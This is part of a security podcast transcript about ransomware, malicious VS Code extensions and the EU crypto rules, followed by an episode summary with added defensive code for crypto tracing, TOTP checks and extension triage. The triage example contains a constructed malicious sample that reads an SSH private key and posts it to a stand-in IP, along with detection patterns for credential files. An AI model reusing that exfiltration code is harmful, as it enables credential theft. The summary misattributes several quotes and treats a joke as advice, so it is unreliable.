Ralph May
Monero, Monero. Monero.
Ryan
What else we got? Ransomware Gang uses chicken to encrypt. No, no, that's something else.
Ralph May
Yeah, I mean, we got plenty of ransomware articles. I mean, it's like they're. I mean, this is like the normal SOP around the world. Right. So I think the other one that was kind of on the top here was that Sam's Club investigates the Clop ransomware breach claims.
Ryan
So Sam's Club, an American warehouse supermarket chain owned by US retailer Walmart, is investigating claims. They operate over 600 warehouses in the United States and Puerto Rico.
Ralph May
Yeah.
Ryan
2.3 million employees. Bunch of money.
Test Speaker
Oh, yeah.
Ryan
Clop claims the breach after Ransomware Gang also started extorting dozens of victims. They used a zero day to get in.
Ralph May
Oh, okay. So they're saying it was not a breach, but rather a case of them obtaining username and passwords from phishing campaigns.
Unknown Speaker G
Okay.
Ralph May
We reset the password for these accounts, taking additional. I mean, this is common for big organizations that have lots and lots of users of their platforms to get compromised in a bunch of different ways. Right.
Ryan
This is why they got to have MFA turned on.
Ralph May
Yeah.
Ryan
Or they just put a captcha, you know, that protects everybody.
Test Speaker
Oh, captchas are extremely safe. Like God loves captcha.
Unknown Speaker E
Yeah, yeah. Tell that to the domain I lost over the weekend.
Ryan
You lost the domain over the weekend?
Test Speaker
It was.
Unknown Speaker E
Well, I made a website for a nonprofit and they've kind of stopped doing a whole lot of stuff. But the most traffic that domain has ever gotten is from hackers trying to brute force or otherwise attack the site. And while it was at BSides San Diego, I got a notice from the host company saying, hey, your usage went off the charts. And I went in and the cool thing. And one of the reasons I use this host is because they've got good security. I've had them for years and they just keep expanding and doing it right. And they. They suspended the account. They locked it down. And, you know, it's like, yeah, just nuke it. I'll do a backup. I've got backups. Nuke it. Let's take it off the board. It's going to be transferred to someone else soon anyway, so. It's hard to stay ahead of this stuff because those blasted hackers are incessant. I finally had to turn off email notifications of every time they were trying to log in with a bogus user ID because I'd be getting 50 in five minutes.
Ryan
We shouldn't have advertised BSides San Diego as my fault. Teaching an excellent how to build a local LLM class that she will now be teaching here. Highly suggested.
Unknown Speaker E
I do have the. The webcast on Thursday. That would have to be brought up at some point during the cast, but it was. It was very cool. It was. It was very nice. Been getting a lot of positive feedback. I gave the first one at scale and then I did the workshop at BSides and wonderful students, wonderful questions, great people, good times, good stuff.
Unknown Speaker F
And you took a great photo of Kelly. I loved that picture.
Unknown Speaker E
Kelly really rocked that keynote. That was really cool.
Unknown Speaker F
I'm gonna go next year for sure.
Ryan
Buy your tickets quick. Okay.
Unknown Speaker G
This is.
Ryan
Dude, I received so many asks for tickets. I've had bad people. That's. I. This is the worst part. I'm gonna say this out loud several of the times. I. If I got a ticket, I would immediately give it to the first person who asked me last because I didn't want to deal with it. And that worked out for like four people. And me saying that you're gonna be one of.
Ralph May
Oh, my God. I can't believe that I asked you, man.
Ryan
You should have asked. I know. I told you. You're gonna you could couch surf, you know.
Unknown Speaker G
You didn't want to come up.
Ralph May
Capstone.
Unknown Speaker G
What is it?
Ralph May
There's another article about the Van Helsing ransomware. Anyways, they're targeting Windows, ARM and ESXi systems. I think there's like the bigger thing here. I know. This is not that crazy. Is that they're just going after more than just Windows systems. Right. Any systems they can possibly. I know. ESXi. Honestly, ESXi is going to die here soon because Broadcom's about to sell that one down the river. So no one's going to have ESXi anymore. But that. Anyhow, just targeting all the platforms they possibly can with. All of it.
Unknown Speaker G
Yeah.
Ryan
It's still a juicy target. Right. Because it's got all the keys to the kingdom.
Unknown Speaker G
Right.
Ryan
And there's been a couple recent vulnerabilities with it. It's going to take everyone forever to slowly migrate off of it.
Ralph May
They got 80, 20 rule here. 80% of the ransom payments go to the operator or go to the person who did the compromise, and only 20% go to the operator readers.
Ryan
I didn't know that that was. That's a good ratio.
Ralph May
Yeah. And they use an escrow system.
Unknown Speaker G
Yeah.
Ralph May
So they never have access to. They, they. They're not. The, the person who's making the rent somewhere is not like, oh, we're taking all the money. Hopefully we pay.
Ryan
Sometimes I rethink my career.
Test Speaker
I don't. I don't like how Van Helsing is. Is targeting BSD. I just noticed. That makes me nervous.
Ralph May
No, there's no way they're making ransomware for BSD systems.
Test Speaker
I literally just saw it on articles.
Ralph May
You'll never pay.
Test Speaker
You see that there? Look at that. Oh, my goodness.
Ralph May
You'll take. But you'll take that as an opportunity to just rebuild your system.
Test Speaker
Pretty much. If somebody would give me an idea. Hey, come on over to Ark. We're waiting for you.
Ralph May
Yes, yes. You can compile everything, the whole thing. It's the most artisanal. Oh, my God.
Ryan
All right, here's an interesting one. As I'm reading news articles, trying to find cool stuff for us to talk about.
Ralph May
Oh, look at you.
Ryan
Look at me actually reading the news.
Unknown Speaker E
Well, we do have kind of a pattern in the malware finds a way. We've got two articles talking about NPM and then another one that I. NPM's.
Ralph May
Really hot right now. It is so hot.
Unknown Speaker E
And then on top of it, ransomware has also been found in VS Code extensions. And so what I'm seeing in those three articles in particular is this pattern of NPM is a library that is used to help supplement web developers and other kinds of developers. And the VS Code extensions are similar. They're add-ons to help people who are using VS Code. And these sort of additional things are being targeted over and over again as a way into madness.
Ryan
Yeah, I will admit as a blue teamer, the VS Code extension stuff is a little scary just because oh you're.
Ralph May
VS Coding it.
Ryan
Just vibing, you know, don't know a lot of security people who are like digesting enough logs to really look at those. That type of stuff and what they're installing and what they're going and also or at least protections to prevent people from randomly downloading.
Ralph May
Yeah, there is an insane amount of extensions in the VS Code library and they all do like there's like five extensions for like the same thing too.
Ryan
Like not sure which one's the best.
Ralph May
Yeah, yeah, it's like we're back in the day. We'd be like download this file and there's like 75 download buttons. They're all ads. The one that actually is to download the file. That's what it feels like with VS Code extensions. Right?
Test Speaker
That is true.
Ralph May
All of them are malware except for one.
Test Speaker
And hopefully you don't have the luck of the draw. I mean now you got me thinking about going back and checking out my rust-analyzer.
Ryan
Yeah, I one time I logged into a via like my VS Code and I hadn't logged in for a while and a couple of the extensions were like removed and I was like oh, like why were those removed or turned off? And I'm like what? And so diving into it thinking like, did I get one? Did it hit me? But I try to use the leave.
Ralph May
Amount of VS Code or Cursor extension, same thing.
Ryan
Oh, Cursor. Huh huh. Look who's vibe coding now.
Unknown Speaker G
Oh, I'm pretty cool.
Ralph May
I'm in. I'm in deep. I'm too deep. Are you?
Ryan
Oh yeah, we don't have any, we don't have any vibe coding articles surprisingly.
Ralph May
Yeah, so. And I hear it too all the time and I'm like, no, my coding's different. But anyways, yeah, so.
Unknown Speaker E
So I'm an alien in that I'm still using stuff like Sublime Text and oh yeah, I, I avoid visual editors and tools like the plague because I still have PTSD from a gajillion years ago dealing with all the bloat code generated by. I don't even remember the name.
Test Speaker
It's okay. I guess we're aliens together. I still use Vim.
Ralph May
Oh, wow.
Unknown Speaker E
I'm not quite that much.
Ralph May
I don't think you realize how much more productive you would be with just VS Code. Which, by the way, there's nothing visual about VS Code.
Test Speaker
I put up the screen too, you know. You know, throw a little term in there to get the bottom screen.
Ryan
I use rainbow tabs, you know, like it shows me make sure everything's tabbed the right way. That's. It's very. I'm very visual. I don't know if this is. I use Jupyter notebooks in visual code. In VS Code. Like it's like a box inside of a box.
Unknown Speaker E
Oh yeah, you can use notebook Jupyter notebooks inside VS Code.
Ryan
Yeah, yeah, it's a lot easier. So then I get all the extensions. Yeah, it's very good.
Test Speaker
Damn, I feel like I'm sitting in a code confessionals meeting or something like that.
Ralph May
So wait till you figure out how to use MCPs and then you'll know what's up.
Unknown Speaker E
Well, I'm gearing up for my next AI course, so I'm looking for ways to avoid melting my brain quite as many times.
Test Speaker
Yeah, it's just so much out there. It's just kind of like you're like, oh yeah.
Unknown Speaker E
If it weren't for the fact that I already know SQL, I already know Python, I already know how to do a whole bunch of this stuff. And then there's the stuff that I don't know. I feel like if I didn't have the advantages of the things I do, I'd be lost.
Ryan
Speaking of losing stuff, let's go back to the segue master here.
Test Speaker
There you go.
Ryan
The EU bans anonymous crypto payments. Oh, how are they gonna do that? Don't ask me, but I think there's making like.
Ralph May
I feel like laws are just getting made up. They're like, you know what? We're just gonna make air. Ban. Ban it. You can't breathe air anymore, dude. Yeah, we'll see how that works.
Ryan
We're all gonna drink. We're all gonna breathe water. Soon.
Test Speaker
We're gonna grow gills.
Ralph May
Do this.
Test Speaker
Yeah, exactly.
Ralph May
I mean, sir, you're funny.
Ryan
So the legislation applies to payments made through online service providers, also known as hosted wallets. I probably should have read this one before I read the other ones. But it also applies to platforms that exchange regular fiat currency. It does not apply to owners' hardware self-hosted wallets. So technically, if Bitcoin is anonymous, could we, could you still use that. Right? This is when we. So we need to read these beforehand. But this is kind of interesting. I don't think it's going to. It's like one of those laws that's just put in place to be put in place. Don't know how you're going to really affect criminals or how you're going to stop people from still doing this. Yeah, there's a. There's a quote in here that generally prohibiting anonymous payments would at best have minimal effects on crime, but it would deprive innocent citizens of their financial freedoms. That's. That's pretty much where I'm.
Ralph May
Yeah.
Unknown Speaker G
I mean, it talks of anonymous donations and, you know.
Ralph May
Yeah.
Unknown Speaker G
When you're a dissident and you go, it's like, I need to raise money, and you go, oh, I want to give money for. To help this dissident. It's like. Yeah, you can't do it anonymously. It's like, oh, God.
Ralph May
Yeah, you definitely. That's. That's really the bad stuff.
Ryan
Right there. Isn't cash anonymous? Well, if I wear a mask, I.
Ralph May
Mean, cash is totally not anonymous. You know what I mean? Like, that's.
Unknown Speaker G
Honestly.
Ralph May
Drug dealers hate cash. They hate it. Hate it.
Test Speaker
Well, what if you wear gloves?
Unknown Speaker F
How do you know this?
Unknown Speaker G
I was going to say I was the same question, but then I saw, like, his tag is Florida Man, so I'm like, that.
Test Speaker
Coding Confessionals, part two.
Ryan
Yeah, the. The next sentence of that quote, I should have kept going, the medicines or sex toy. Sex toys I buy is nobody's business. That was.
Ralph May
I mean, listen, the truth is, they're. Right. Right.
Ryan
Yeah.
Ralph May
You know, like, why is that the government's business? I mean, legitimately, if we want to talk about just, like, where the government's lane is, whichever government, it doesn't matter where you're at. It should.
Unknown Speaker E
As a general category.
Ryan
Yeah.
Ralph May
As a general category, it shouldn't be, you know, about the prescription medications that I'm taking. Right. Or the, you know, the sex toys or whatever. Right. It's really just none of their business. All right.
Ryan
I always wonder, is it chicken time? Oh, I can't. It's chicken time. All right, you can do the chicken article then.
Ralph May
Oh, I didn't read it.
Ryan
You didn't read it? It's. It's literally like one sentence.
Unknown Speaker E
This is. This doesn't know where we're really winging it.
Ralph May
All right, so it sounds like South Africa. Yes. In South Africa, they got cooked and royal even. Yeah. Essentially, there was a cybersecurity incident, the company disaster recovery protocols. However, there was some downtime. This downtime is going to cost them a bunch of money to catch up in the backlog of chicken production. And supposedly they lost like a million dollars.
Test Speaker
Wow.
Ralph May
And they argued no confidential sensitive data. So essentially they got ransomware. Most likely. Yeah. I'm just not sure what. Mostly they're just saying we lost money because of production. And it doesn't say they paid anything.
Test Speaker
This might be time to develop poultry protocols.
Ryan
This article taught me that there's a breed of chicken called broiler chickens.
Ralph May
I feel like that's different types of chickens.
Unknown Speaker E
There are so many different kinds of.
Ryan
Chickens, so that ones are meant to be chickens. Chicken levels.
Ralph May
Chicken levels. There are different types of chicken, some of them for laying eggs, some of them for eating. They're not all. They don't all taste good. Not everything tastes like chicken.
Test Speaker
So it's kind of like how data travels through a network card. So you got your encapsulation and a decapsulation type scenario there.
Ralph May
No.
Unknown Speaker F
Anyway, is this gonna affect the price of eggs at all?
Ralph May
Oh, my God.
Ryan
They're broiler chickens. This is going. This goes directly with. With the direct article that we read where the chip where there was like chicken wings versus eggs, and eggs were going up, but chicken wings were going down. Right? Yeah. Different types of chickens. So we're fine.
Ralph May
Right?
Ryan
I forgot. I read. I read that article about the National Chicken Institution or something like that. It was. I was pretty amazed.
Test Speaker
So there's a wing division. All right.
Ralph May
Oh, God. Well, all right, so chicken. Chicken article aside, right. Funny, because it's chicken, but the. Any. Any vertical, right. Is susceptible, essentially. You know, every company's got it now, right? Which is why MSPs are so popular nowadays, because they don't deal with any of that. But they all have it. They all need email, they all need Teams and Zoom and meetings and all the other stuff. Even if it's meetings about chickens. I mean, I don't. But, you know, this is. This is all still going on. It's not like everybody's like, you know, we don't need a computer at our business. Nothing. We need no computers. It's also appropriate that it would be in another country which probably has, you know, less budget for security stuff.
Unknown Speaker G
So.
Test Speaker
Hey, so I learned something new today. So it's. There's levels of chickens just like there's flavors of Linux. I mean, they go hand in hand, you know.
Ralph May
All right, well, I think we broiled our last article.
Ryan
We went through a lot today. We didn't. I'm happy for us. I feel like we're light hearted. Did all the articles.
Ralph May
We did a lot of articles.
Ryan
Maybe we were an intel feed bullets.
Unknown Speaker E
I thought that was handled well.
Ryan
So it was a light weeks. Especially because I was not reading any news articles for the past week. So that's you.
Unknown Speaker G
You.
Ralph May
You single handedly make all the articles? Is that what you're trying to say?
Ryan
I'll blame myself. Me and a couple different ChatGPT bots, you know, just pump them.
Ralph May
Oh my gosh. Out. Yeah.
Ryan
You guys didn't know this, but I'm really a billionaire news article writer in the background.
Ralph May
How do you get paid for this awesome.
Test Speaker
Way awesome ghostwriters, you know?
Ryan
Do you remember, do you remember it? At Wild West Hackin' Fest we read an article that was like clearly AI written. It was like, oh yeah.
Ralph May
We were just dying laughing and we were roasting it.
Ryan
After that moment I realized I could be an AI writer too.
Ralph May
Yes. You know what the funny part is that when we were reading it we realized that we had gotten too. We're like spreading this like worthless article as a group and then realizing we did it. We had, you know.
Unknown Speaker E
You realized it.
Ralph May
Yeah.
Unknown Speaker E
How many people don't.
Ralph May
Oh my God. Yeah. Well, there's just so many articles too. And like in some of these, even from the places that we do find a good article, there'd be like 10 kind of like fluff articles and then like one real article that actually happened that week. Like one like real story, you know?
Unknown Speaker E
Yeah.
Unknown Speaker G
So yeah, most InfoSec articles like you have to skip to like the second to last paragraph to get like the real key items. Like I started doing that. Like scroll down to the bottom, go up one paragraph, go up one paragraph more and you go, oh, there's the.
Test Speaker
Whole meat potatoes right there.
Unknown Speaker G
That's the whole like meat of the thing. Because usually like the last paragraph is like we reached out to the company and they didn't have any comment. And that's like the last. But like above it is the whole like key item going on there.
Ralph May
I've been working on.
Test Speaker
Pop up.
Unknown Speaker F
And that last article kind of just made me think about all of the small, small, small shops that don't have an MSP. They just, they're so small, you know, hats off to them. I mean there's just so much to be vigilant about now when you just have a skeleton crew like that.
Ralph May
Oh yeah, business email compromise. They're looking for you too. They're dying to make that next little one. So anyways, I just.
Ryan
I just totally realized I could export this entire our note section and just upload it to ChatGPT and have it.
Ralph May
Yeah and then just have it summarize it for you. Oh my God. Here's what I've been doing. I have an agent that's scouring for articles for me and just lets me know when there's good ones.
Ryan
God damn you and agents. I. I don't. I'm not that crazy. I'm not installing one of those on here.
Ralph May
What? I didn't install it on anything. It just works. Don't you loud agentic AI? Yes. It's all the rage. It's. It's everywhere. It's in your computer.
Unknown Speaker E
Somebody else's hardware.
Ralph May
Yeah.
Ryan
I'm going to take my Windows 11 and go offline. All right.
Unknown Speaker F
Good luck with that.
Ralph May
Speaking of going offline. All right, everybody, thank you for joining us and we will see you guys next time. Bye.
Test Speaker
Later.
Podcast Summary: "The Oracle of Lies!" – 2025-03-31
Podcast Information:
The episode kicks off with the team engaging in light-hearted banter, testing audio settings, and discussing custom-designed coins related to their community. Ryan mentions shipping issues with the coins, highlighting their effort to engage listeners beyond typical podcast content.
Notable Quote:
The conversation shifts to enhancing password security. Ralph May introduces the benefits of using security keys over traditional passwords, emphasizing the importance of multi-factor authentication (MFA).
Notable Quotes:
Ralph May (06:18): “Number one is that if you do a long press, it will just print out a password, right? Or just a long text, right? So if you have any device that you want to log into, you can just set it all to the same password. It's like 35 characters. You'll never be able to, you know, guess it or whatever, right?”
Ryan (07:30): “Nothing. Oh my God.”
The core discussion revolves around the Oracle security data breach. The team analyzes the incident where Oracle’s Single Sign-On (SSO) credentials were leaked online. They critique Oracle's response, pointing out the company's attempts to deny the breach and manipulate narratives.
Key Points:
Ralph May (09:30): Highlights Oracle's "shaggy defense" where the company denies responsibility by rebranding services.
Unknown Speaker G (11:50): Explains tactics used by threat actors on breach forums to obscure their activities, such as deleting and recreating accounts.
Ralph May (14:19): Criticizes Oracle's confusing distinction between "Oracle Cloud" and "Oracle Classic" to downplay the breach's impact.
Notable Quotes:
Unknown Speaker G (12:03): “All these threat actors, like, claims that they got access, they're trying to refute them, but then it's like, well, they're also trying to clean up the evidence.”
Ralph May (16:03): “Oracle is just as bad with security as they were 20 years. It's like they. Even worse now.”
The team discusses the immediate actions an organization should take if its accounts appear in a breach dump: treat every affected account as compromised, reset all of them, rotate whatever secrets they authenticate with, and move to stronger authentication mechanisms.
Notable Quotes:
Ralph May (15:36): “Look at resetting those accounts, right? Like, I mean, all of them, everything, right. And however those are being authenticated, I mean, let's just assume that they're all, all compromised and you should go through like an account reset for all of them.”
Unknown Speaker G (19:24): “Most InfoSec articles you have to skip to like the second to last paragraph to get like the real key items.”
A significant portion of the episode delves into the security limitations of the Signal messaging app. The hosts critique how user errors, such as accidentally adding the wrong person to a chat, can lead to security breaches despite Signal's robust encryption.
Key Points:
Ralph May (30:01): Explains the incident where a user accidentally added a journalist to a sensitive chat, leading to unintended information disclosure.
Unknown Speaker E (32:01): Highlights the importance of following established security protocols and not solely relying on user vigilance.
Notable Quotes:
Ralph May (30:20): “The moral is Signal cannot help you from making mistakes. User error, adding the wrong person in the chat, it will not prevent that.”
Unknown Speaker F (33:50): “It’s an extra safety check as opposed to the only way to prevent phishing.”
The hosts cover recent ransomware cases, focusing on the Caesars Entertainment hack. They commend the FBI's swift action in freezing ransom funds by tracing the cryptocurrency transactions.
Key Points:
Ryan (38:01): Details how the FBI tracked and froze approximately 402.4 bitcoins in an Avalanche wallet during the Caesars Entertainment ransomware case.
Ralph May (40:08): Emphasizes that Bitcoin is not truly anonymous and mentions tools like Chainalysis that aid in tracking cryptocurrency transactions.
Notable Quotes:
Ryan (38:02): “The FBI acted swiftly to prevent the hackers from moving the ransom fund, successfully freezing this substantial amount when the criminals attempted to convert the crypto into other forms.”
Unknown Speaker G (41:20): “You can solve crimes without having encryption backdoors.”
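Ralph May's point at 40:08, that Bitcoin is pseudonymous rather than anonymous, rests on one mechanism: every transaction is public, so an analyst can start at a known ransom-payment address and propagate a "taint" fraction forward until the coins land on an address tagged as belonging to an exchange, which is where a freeze request can be served. The following is an added example written for this page, not code from the podcast or from Chainalysis; the ledger, addresses, amounts and exchange tags are all constructed, and real tooling differs mainly in scale and in the size of its address-tagging database.

```python
"""Taint-tracing over a constructed transaction graph (added example).

Each transaction spends from input addresses to output addresses. The fraction of a
transaction's inputs that is traceable to the ransom address is applied to every
output, so partial mixing with clean coins dilutes but does not erase the trail.
"""
from collections import defaultdict

# Constructed ledger in confirmation order (NOT real transactions or addresses). Amounts in BTC.
LEDGER = [
    {"id": "tx1", "inputs": [("victim_addr", 402.4)], "outputs": [("ransom_addr", 402.4)]},
    {"id": "tx2", "inputs": [("ransom_addr", 402.4)], "outputs": [("hop_a", 200.0), ("hop_b", 202.4)]},
    # hop_a is combined with 100 BTC of unrelated coins: a crude attempt at mixing.
    {"id": "tx3", "inputs": [("hop_a", 200.0), ("clean_addr", 100.0)], "outputs": [("mixer_out", 300.0)]},
    {"id": "tx4", "inputs": [("mixer_out", 300.0)], "outputs": [("exchange_deposit_1", 300.0)]},
    {"id": "tx5", "inputs": [("hop_b", 202.4)], "outputs": [("exchange_deposit_2", 202.4)]},
]

# Address attribution, the expensive part of real chain analysis (constructed here).
TAGGED = {"exchange_deposit_1": "ExchangeA", "exchange_deposit_2": "ExchangeB"}


def trace_taint(ledger, source, tagged):
    """Return ({exchange_label: tainted_btc}, [(tx_id, address, tainted_btc), ...])."""
    received = defaultdict(float)   # total BTC ever credited to an address
    tainted = defaultdict(float)    # how much of that is traceable to `source`

    def fraction(addr):
        if addr == source:
            return 1.0
        return tainted[addr] / received[addr] if received[addr] else 0.0

    hops = []
    for tx in ledger:
        total_in = sum(amt for _, amt in tx["inputs"])
        tainted_in = sum(amt * fraction(addr) for addr, amt in tx["inputs"])
        f = tainted_in / total_in if total_in else 0.0
        for addr, amt in tx["outputs"]:
            received[addr] += amt            # always credit, so later dilution is computed correctly
            if f > 0:
                tainted[addr] += amt * f
                hops.append((tx["id"], addr, round(amt * f, 8)))

    report = defaultdict(float)
    for addr, label in tagged.items():
        if tainted[addr] > 0:
            report[label] += tainted[addr]
    return dict(report), hops


def freeze_targets(report, min_btc=1.0):
    """Exchanges holding at least `min_btc` of traceable ransom proceeds, largest first."""
    return [label for label, btc in sorted(report.items(), key=lambda kv: -kv[1]) if btc >= min_btc]


if __name__ == "__main__":
    report, hops = trace_taint(LEDGER, "ransom_addr", TAGGED)
    for hop in hops:
        print("%-4s -> %-20s %10.4f BTC tainted" % hop)
    print("freeze requests to:", freeze_targets(report))
```

The mixing step in tx3 shows why naive laundering fails: the 100 BTC of clean coins only changes the taint fraction to two thirds, and the full 200 BTC of ransom value still arrives at ExchangeA. Real investigations add heuristics such as change-address clustering and must contend with privacy coins and cross-chain swaps, which is the context for Unknown Speaker G's remark that these crimes are solved without encryption backdoors.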
Discussion shifts to the Clop ransomware breach at Sam's Club, owned by Walmart. The team explores the breach's methodology, which involved phishing campaigns to steal usernames and passwords rather than exploiting zero-day vulnerabilities.
Key Points:
Ralph May (43:00): Notes that Sam's Club claims the breach was due to phishing rather than a direct system exploit.
Ryan (43:25): Advocates for the implementation of Multi-Factor Authentication (MFA) and captchas to mitigate such attacks.
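Ryan's recommendation at 43:25 is MFA, which matters here because the Sam's Club intrusion is described as starting from phished usernames and passwords. As an added example written for this page (not code from the podcast, Sam's Club or Walmart), the following implements the second-factor check itself: a time-based one-time password verifier per RFC 4226/6238, with clock-skew tolerance and replay protection. The shared secret and the times used in the checks are the published RFC 6238 test vectors; nothing else is taken from a real system.

```python
"""RFC 4226/6238 one-time-password verifier with replay protection (added example).

Even with a phished username and password, the attacker still needs a code derived
from a per-user secret and the current time; a code that was already accepted is
refused, so a phished code cannot be replayed later.
"""
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HMAC-based OTP (RFC 4226): dynamically truncate HMAC(secret, counter) to `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    chunk = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(chunk % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at_time: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """Time-based OTP (RFC 6238): HOTP over the number of `step`-second intervals since the epoch."""
    return hotp(secret, int(at_time) // step, digits, algo)


def verify_totp(secret: bytes, code: str, now: int, step: int = 30, window: int = 1,
                last_counter=None, digits: int = 6):
    """Return the matched time counter, or None if the code is rejected.

    - Accepts +/- `window` steps of clock skew between client and server.
    - Uses a constant-time comparison so a wrong digit cannot be detected by timing.
    - Refuses any counter <= last_counter: the server stores the counter of the last
      accepted code per user, which kills replay of a code even inside the skew window.
    """
    counter = int(now) // step
    for delta in range(-window, window + 1):
        candidate = counter + delta
        if last_counter is not None and candidate <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, candidate, digits), code):
            return candidate
    return None


RFC6238_SECRET = b"12345678901234567890"   # test secret from RFC 6238 Appendix B, not a real user's


if __name__ == "__main__":
    now = int(time.time())
    code = totp(RFC6238_SECRET, now)
    print("code:", code, "accepted at counter:", verify_totp(RFC6238_SECRET, code, now))
    print("replay:", verify_totp(RFC6238_SECRET, code, now, last_counter=now // 30))
```

One caveat this example makes visible: a TOTP code is valid for the whole skew window, so a phishing page that relays it in real time still gets in. That is the gap the hardware security keys discussed earlier in the episode close, since their challenge-response is bound to the site's origin rather than typed by the user.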
The podcast addresses the rising trend of malware shipped inside Visual Studio Code (VS Code) extensions and npm packages. The hosts are concerned by how many malicious extensions pose as legitimate developer tools.
Key Points:
Unknown Speaker E (48:38): Points out that ransomware is being embedded in VS Code extensions, exploiting developers by maliciously modifying their development environments.
Ryan (49:21): Highlights the difficulty for blue teamers to monitor and secure against such threats given the vast number of extensions available.
Notable Quotes:
Ralph May (50:14): “All of them are malware except for one.”
Unknown Speaker G (50:20): “Don’t use Signal to get around record retention rules either.”
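Ryan's point at 49:21 is that the volume of extensions defeats manual review. The following is an added example written for this page (not code from the podcast, from any marketplace or from any scanner vendor): a first-pass triage that scans an extension's or package's manifest and source for behaviours that are unusual in a small editor plugin, so that a blue team only reads the ones that trip a flag. The red-flag patterns, the "trusted" name list and both sample packages are constructed for the example.

```python
"""Red-flag triage for editor extensions and npm packages (added example).

Heuristics only: a hit means "a human should read this before it is allowed", not
"this is malware". Patterns and samples are constructed for this example.
"""
import json
import re

# Source-level behaviours that are unusual for a small editor extension.
SOURCE_RED_FLAGS = {
    "spawns_shell": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|\bexec(?:Sync)?\s*\("""),
    "eval_of_decoded_blob": re.compile(r"""\b(?:eval|new Function)\s*\(\s*(?:atob|Buffer\.from)\s*\("""),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "touches_home_dir": re.compile(r"os\.homedir\(\)|process\.env\.(?:HOME|USERPROFILE|APPDATA)"),
    "reads_credential_files": re.compile(r"\.(?:ssh|aws|npmrc|git-credentials)\b"),
}
# npm lifecycle hooks run automatically at install time, before anyone reads the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "preuninstall", "postuninstall")


def levenshtein(a, b):
    """Edit distance, used to spot names one or two typos away from a well-known package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def scan_manifest(manifest, trusted_names):
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append("lifecycle hook %s runs on install: %r" % (hook, scripts[hook]))
    name = manifest.get("name", "")
    for trusted in trusted_names:
        dist = levenshtein(name, trusted)
        if 0 < dist <= 2:
            findings.append("name %r is %d edit(s) from trusted %r (possible typosquat)" % (name, dist, trusted))
    return findings


def scan_source(source):
    return ["source matches %s" % flag for flag, pat in SOURCE_RED_FLAGS.items() if pat.search(source)]


def assess(manifest_json, source, trusted_names):
    """Return a triage record; verdict 'review' means a human reads it before it is allowed."""
    manifest = json.loads(manifest_json)
    findings = scan_manifest(manifest, trusted_names) + scan_source(source)
    return {"name": manifest.get("name"), "findings": findings, "verdict": "review" if findings else "ok"}


TRUSTED_NAMES = ("prettier", "eslint", "typescript")   # constructed allowlist of well-known names

# Constructed sample 1: an ordinary "hello" extension.
BENIGN_MANIFEST = '{"name": "hello-greeter", "publisher": "example", "main": "./extension.js"}'
BENIGN_SOURCE = """
const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand('hello.run',
    () => vscode.window.showInformationMessage('hello')));
}
module.exports = { activate };
"""

# Constructed sample 2: typosquat name, install hook, key theft, raw-IP beacon, decoded eval.
SUSPECT_MANIFEST = ('{"name": "prettler", "publisher": "example2", "main": "./extension.js", '
                    '"scripts": {"postinstall": "node setup.js"}}')
SUSPECT_SOURCE = """
const cp = require('child_process');
const fs = require('fs'), os = require('os'), path = require('path');
function activate() {
  const key = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'), 'utf8');
  fetch('http://203.0.113.7/c2', { method: 'POST', body: key });
  eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());
}
module.exports = { activate };
"""

if __name__ == "__main__":
    for m, s in ((BENIGN_MANIFEST, BENIGN_SOURCE), (SUSPECT_MANIFEST, SUSPECT_SOURCE)):
        print(json.dumps(assess(m, s, TRUSTED_NAMES), indent=2))
```

Two caveats a practitioner would add: regexes are trivially evaded by obfuscation, so the durable control is an allowlist of extension identifiers pinned to their publisher, enforced by the editor's policy settings; and the lifecycle-hook finding applies equally to npm dependencies, where `--ignore-scripts` during install removes the automatic execution the hook relies on.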
A brief segment discusses the difficulties in installing Windows 11 without an internet connection, emphasizing Microsoft's removal of straightforward offline installation options.
Notable Quotes:
Ryan (26:37): “That's the hard part, having that Microsoft account.”
Ralph May (28:31): “Isn't like set up without the Internet this one button, wouldn't that be easy?”
The team discusses recent EU legislation aimed at banning anonymous cryptocurrency payments. They debate the effectiveness and potential unintended consequences of such laws.
Key Points:
Ralph May (54:34): Criticizes the legislation for potentially depriving innocent citizens of financial freedoms while having minimal impact on criminal activities.
Ryan (54:34): Reflects on the challenges of enforcing such laws and questions their practicality.
Notable Quotes:
Ralph May (53:31): “We're all gonna drink. We're all gonna breathe water. Soon.”
Unknown Speaker G (54:38): “When you're a dissident and you go, it's like, I need to raise money, and you go, oh, I want to give money to help this dissident.”
Concluding the episode, the hosts return to the humorous "chicken article" narrative, poking fun at the inclusion of non-technical topics in infosec discussions. They wrap up with reflections on the challenges of keeping up with the ever-evolving infosec landscape.
Notable Quotes:
Ralph May (57:52): “They argued no confidential sensitive data. So essentially they got ransomware. Most likely.”
Test Speaker (57:13): “This might be time to develop poultry protocols.”
Ralph May (62:18): “Speaking of going offline.”
Transparency in Incident Response: The Oracle data breach highlights the critical need for transparency and swift action in incident response. Denial and obfuscation only exacerbate trust issues.
Multi-Factor Authentication (MFA): Emphasized as a fundamental defense mechanism against unauthorized access, especially in large organizations susceptible to phishing attacks.
Cryptocurrency Traceability: The FBI's success in freezing ransom funds shows how far tracing of on-chain transactions has come; public ledgers and exchange tagging make seizure practical and undercut the notion that cryptocurrency is anonymous.
Developer Tool Security: Malware delivered through popular developer tooling such as VS Code extensions and npm packages underscores the need for review, allowlisting and monitoring of what gets installed into development environments.
